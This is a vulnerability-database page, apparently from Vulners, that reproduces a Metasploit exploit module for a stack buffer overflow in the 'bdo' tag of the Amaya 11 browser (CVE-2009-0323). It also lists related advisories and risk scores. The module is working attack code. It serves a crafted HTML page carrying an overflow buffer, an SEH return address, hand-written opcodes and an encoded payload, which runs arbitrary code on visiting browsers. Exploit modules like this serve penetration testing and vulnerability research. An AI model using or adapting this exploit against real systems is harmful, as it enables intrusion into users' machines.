Lucene search
K

Amaya Browser v11.0 'bdo' Tag Overflow

🗓️ 10 Oct 2009 21:51:25Reported by dookie, original exploit by Rob CarterType 
metasploit
 metasploit
🔗 www.rapid7.com👁 22 Views

Amaya Browser v11.0 'bdo' Tag Overflow. Stack buffer overflow exploit in Amaya v11 Browser allows execution of arbitrary code

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-0323
28 Jan 200900:00
circl
Core Security
Amaya web editor XML and HTML parser vulnerabilities
28 Jan 200900:00
coresecurity
Check Point Advisories
Amaya Browser BDO Tag Buffer Overflow (CVE-2009-0323)
16 Aug 201100:00
checkpoint_advisories
CVE
CVE-2009-0323
28 Jan 200920:00
cve
Cvelist
CVE-2009-0323
28 Jan 200920:00
cvelist
Exploit DB
Amaya Browser 11.0 - bdo tag Overflow (Metasploit)
9 May 201000:00
exploitdb
Tenable Nessus
FreeBSD : amaya -- multiple buffer overflow vulnerabilities (a89b76a7-f6bd-11dd-94d9-0030843d3802)
14 Oct 201100:00
nessus
NVD
CVE-2009-0323
28 Jan 200920:30
nvd
OpenVAS
FreeBSD Ports: amaya
13 Feb 200900:00
openvas
OpenVAS
FreeBSD Ports: amaya
13 Feb 200900:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Amaya Browser v11.0 'bdo' Tag Overflow",
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Amaya v11 Browser.
          By sending an overly long string to the "bdo"
          tag, an attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'dookie, original exploit by Rob Carter' ],
      'References'     =>
        [
          [ 'CVE', '2009-0323' ],
          [ 'OSVDB', '55721' ],
          [ 'BID', '33046' ],
          [ 'BID', '33047' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'         => 970,
          'BadChars'      => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Amaya Browser v11',     { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll
        ],
      'DisclosureDate' => '2009-01-28',
      'DefaultTarget'  => 0))
  end


  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Set the exploit buffer
    sploit = "<bdo dir=\""
    sploit += rand_text_alpha(6889)
    sploit += "\x74\x06\x41\x41"
    sploit += [target.ret].pack('V')
    sploit += "\x68\x7f\x01\x01\x7f"   # push 7F01017F
    sploit += "\x58"		   # pop EAX
    sploit += "\x2d\x18\x69\x45\x7d"   # sub EAX, 7A7A0857
    sploit += "\x50"		   # push EAX
    sploit += "\xc3"		   # RETN
    sploit += make_nops(100)
    sploit += payload.encoded
    sploit += make_nops(970 - payload.encoded.length)
    sploit += "\">pwned!</bdo>"

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, sploit)

    # Handle the payload
    handler(cli)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
10High risk
Vulners AI Score10
CVSS 210
EPSS0.6249
22